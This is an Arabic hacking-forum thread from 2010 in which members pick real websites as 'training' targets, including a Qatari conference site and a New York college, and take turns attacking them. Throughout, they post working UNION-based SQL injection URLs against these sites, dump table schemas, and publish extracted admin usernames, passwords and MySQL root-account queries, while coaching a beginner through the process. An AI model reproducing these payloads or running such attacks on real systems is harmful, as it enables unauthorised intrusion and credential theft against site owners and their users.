غرفة حقن قواعد البيانات {غرفة Sql }

medoo_mohamed · 08-11-2010, 08:05 PM

وانا متواجد الليلة ان شاء الله وفيه اهداف جديدة

ترجع بالسلامة يا غالى

المصدر: :: vBspiders Professional Network ::

darkman.dz · 08-11-2010, 11:39 PM

تفضل أخي
الحقنة التي وعدتك بها

كود:

mantis_user_table:password:bugtracker
mantis_user_table:lost_password_request_count:bugtracker
user:password:cvs
user:Password:mysql
user:password:openuser
==============================
**********************************************************
**mantis_user_table:password:bugtracker**
**********************************************************
mantis_user_table:id:bugtracker
mantis_user_table:username:bugtracker
mantis_user_table:realname:bugtracker
mantis_user_table:email:bugtracker
mantis_user_table:password:bugtracker
********************************
***user:password:cvs***
********************************
user:id:cvs
user:fullname:cvs
user:username:cvs
user:password:cvs
user:auth:cvs

**************
for root****
**************
user:Host:mysql
user:User:mysql
user:Password:mysql

*************************************************
account of admin and the moderators
1:allan:apple123
2:oli:fefeef
3:mog:gom
4:nicholas:lom456ond
5:afoster:ofa
6:summers:mus
************************************

وهاته حقنة الحصول على حساب ال root

كود:

http://www.adas-fusion.eu/workpackage.php?id=-1%20UNION%20SELECT%201,2,3,4,concat%28user,0x3a,password%29,6+from+mysql.user--

:Great:

darkman.dz · 08-11-2010, 11:41 PM

+ أنا تفحصت الموقع
هوفقط المركب على السيرفر المحلي
بالإصاقة إلى موقعين أو ثلاثة تابعة لنفس الموقع

Master vbspiders · 08-12-2010, 12:17 AM

[align=center]ما يجيبها الا رجالها ابطال والله...
واصلو
تحياتي[/align]

NeTCaT-Ma · 08-12-2010, 12:35 AM

السلام عليكم شباب ممكن هدف سهل أتعلم عليه

Master vbspiders · 08-12-2010, 12:42 AM

اقتباس

المشاركة الأصلية كتبت بواسطة mr.tchach


	السلام عليكم شباب ممكن هدف سهل أتعلم عليه

[align=center]جاري البحث...
تحياتي[/align]

darkman.dz · 08-12-2010, 12:43 AM

اقتباس

المشاركة الأصلية كتبت بواسطة mr.tchach


	السلام عليكم شباب ممكن هدف سهل أتعلم عليه

back to the old targets
and try to injecting it again
that's so easy to do
for can know your mistake
and for learn more about that

NeTCaT-Ma · 08-12-2010, 12:44 AM

شكرا لك أخي

Master vbspiders · 08-12-2010, 01:19 AM

[align=center]الهدف الجديد هو موقع وزارة الخارجية لدولة قطر
الهدف فقط للتدريب لا اكثر
الرابط :

كود PHP:

  http://www.qatar-conferences.org/arab/newsdetail.php?id=3

الموقع تم حقنو يدوي وتم استخراج كامل المعلومات مسبقأ
بالتوفيق
تحياتي

[/align]

Master vbspiders · 08-12-2010, 01:25 AM

[align=center]تصحيح بسيط..
الهدف السابق هو لادارة الموتمرات الخاصة بدولة قطر
تحياتي[/align]

NeTCaT-Ma · 08-12-2010, 02:00 AM

سلام عليكم هدا ما استطعت أن أطلعه
عدد الأعمدة المصابة 1.2.3.4.5
الأعمدة المصابة 2.4.5
الإصدار 5
هنا توقفت في هده الحقنة تحقق منها أخي
http://www.qatar-conferences.org/ara...tail.php?id=-3 union select 1,version(),3,4,5+from+information_schema.columns--

Master vbspiders · 08-12-2010, 02:21 AM

[align=center]تسلم ايدك على المعلومات
مممم ياريت تكملها نريد الادمن منك مش من غيرك ^_^
خذ وقتك...
وبالنسبة للبقية هذا هدف جديد لكن انا ما حقنتو انتم جربوه :

كود PHP:

  http://www.mcny.edu/news/newsdetail.php?id=389%27

بالتوفيق
تحياتي

[/align]

kanvi · 08-12-2010, 07:18 AM

اقتباس

المشاركة الأصلية كتبت بواسطة Master vbspiders


	[align=center]تسلم ايدك على المعلومات مممم ياريت تكملها نريد الادمن منك مش من غيرك ^_^ خذ وقتك... وبالنسبة للبقية هذا هدف جديد لكن انا ما حقنتو انتم جربوه : كود PHP: `http://www.mcny.edu/news/newsdetail.php?id=389%27` بالتوفيق تحياتي [/align]

تم حقن الهدف: الموقع بسيط

اصدر القاعدة

كود PHP:

  http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,@@version,7,8,9,10,11,12--

5.0.91-community

استخرج اسم القاعدة:

كود PHP:

  http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12+from information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--

trackrsvp_user:password:audrey_mcnydb

استخراج الجداول:

كود PHP:

  http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,group_concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12+from information_schema.columns+where+table_name=0x747261636b727376705f75736572--

كود PHP:

  trackrsvp_user:id:audrey_mcnydb,
trackrsvp_user:username:audrey_mcnydb,
trackrsvp_user:password:audrey_mcnydb,
trackrsvp_user:fname:audrey_mcnydb,
trackrsvp_user:lname:audrey_mcnydb

الحقنة النهائية:

كود PHP:

  http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,group_concat(id,0x3a,username,0x3a,password,0x3a,fname,0x3a,lname),7,8,9,10,11,12+from+trackrsvp_user--

1:aoh:test2:Andy:Oh

ملاحظة بسيطة:

نرجو من كل عضو يقوم بالحقن موقع ان يضع مراحل عملية الحقن و ذكر المشكل التي تعرض لها لتعم الفائدة على جميع وحرصا على جملية الموضوع

Master vbspiders · 08-12-2010, 02:23 PM

اقتباس

المشاركة الأصلية كتبت بواسطة kanvi


	تم حقن الهدف: الموقع بسيط اصدر القاعدة كود PHP: `http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,@@version,7,8,9,10,11,12--` 5.0.91-community استخرج اسم القاعدة: كود PHP: `http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12+from information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--` trackrsvp_user:password:audrey_mcnydb استخراج الجداول: كود PHP: `http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,group_concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12+from information_schema.columns+where+table_name=0x747261636b727376705f75736572--` كود PHP: `trackrsvp_user:id:audrey_mcnydb, trackrsvp_user:username:audrey_mcnydb, trackrsvp_user:password:audrey_mcnydb, trackrsvp_user:fname:audrey_mcnydb, trackrsvp_user:lname:audrey_mcnydb` الحقنة النهائية: كود PHP: `http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,group_concat(id,0x3a,username,0x3a,password,0x3a,fname,0x3a,lname),7,8,9,10,11,12+from+trackrsvp_user--` 1:aoh:test2:Andy:Oh ملاحظة بسيطة: نرجو من كل عضو يقوم بالحقن موقع ان يضع مراحل عملية الحقن و ذكر المشكل التي تعرض لها لتعم الفائدة على جميع وحرصا على جملية الموضوع

بارك الله فيك اخي الغالي حقنة رائعة
واصل وننتظر الاخ مستر تيج...
مستر تيج>>مممم اذا واجهة اي مشاكل اطرحها هنا والاخوان ما راح يقصرو معاك
تحياتي

عبد الله ر · 08-12-2010, 12:42 PM

اقتباس


	الهدف الجديد هو موقع وزارة الخارجية لدولة قطر الهدف فقط للتدريب لا اكثر الرابط : كود PHP: http://www.qatar-conferences.org/arab/newsdetail.php?id=3

تم حقن الموقع وهذه هي النتائج
لاحظت وجود اكثر من سيجما حالوت ان اجرب عدد منهم وهذه هي النتائج
الجداول التي تحتوي على باس ةورد(لاحظ السيجما)

http://www.qatar-conferences.org/ara...115,%2037%29--

admin_login:password:qatarcon_ararabsummit
admin_login:password:qatarcon_arcomoros
admin_login:password:qatarcon_ardarfur
admin_login:password:qatarcon_ardarfur2
admin_login:password:qatarcon_ardemo10
admin_login:password:qatarcon_ardevelopment
admin_login:password:qatarcon_ardialogue09
admin_login:password:qatarcon_ardialogue10
admin_logi

حقنة استخراج العواميد الموجودة فن الجدول admin_login
http://www.qatar-conferences.org/ara...5f6c6f67696e--

نتيجة الحقنة

admin_login:id:qatarcon_ararabsummit
admin_login:username:qatarcon_ararabsummit
admin_login:password:qatarcon_ararabsummit
admin_login:id:qatarcon_arcomoros
admin_login:username:qatarcon_arcomoros
admin_login:password:qatarcon_arcomoros
admin_login:id:qatarcon_ardarfur
admin_login:username:qatarcon_ardarfur
admin_login:password:qatarcon_ar

لاحظ اختلاف السيجما واستخراج الاعمدة من عدة جداول بنفس الاسم من سيجما مختلفة

حقنة استخراج بيانتا الادمن
http://www.qatar-conferences.org/ara...+admin_login--

يمكنك التنقل في السيجما من خلال وضع اسم السيجما في الاستغلال قبل admin_login مسبوقا بـ .
from+admin_login => from+qatarcon_ararabsummit.admin_login

معلومات الادمن (اليوزر بعده الباس)
________________
p4362721
p4362721
________________
dibarab
dibarab
________________
dibarabdemocracy
dibarabdemocracy
________________
p5818834
p5818834
________________
dibdemocracy08
dibdemocracy08
________________
p5818834
p5818834
________________
dibdialogue08
dibdialogue08

لن اضع الحقن التي استخرجت بها المعلومات لاني شرحت الطريقة فوق بل انتم قوموا بذلك للتعلم فقط

يا شباب انا بنصحكم ان لا تبحثوا عن لوحة التحكم
لانه موقع عربي (قطر)
اصلا انا بتوقع ان ما في لوحة تحكم لاني لاحظت ان هذا الموقع كأنه مرتبط مع مواقع حكومية قطرية اخرى
يمكن تكون لوحة تحكم وحدة لهذه المواقع

الغريب ان اسم المستخدم نفسة كلمة السر !!
ارجو من الاخ ماستر مراسلة ادارة الموقع لترقيع الثغرة

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
العدد (3) من غرفة الحقن	darkman.dz	SQL قواعد البيانات	397	12-30-2010 01:23 PM
جهاز من غرفة جـنـسـيـة	MasTer MiND	Hackers Showoff	6	06-25-2009 04:01 PM

التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام

غرفة حقن قواعد البيانات {غرفة Sql }

SQL قواعد البيانات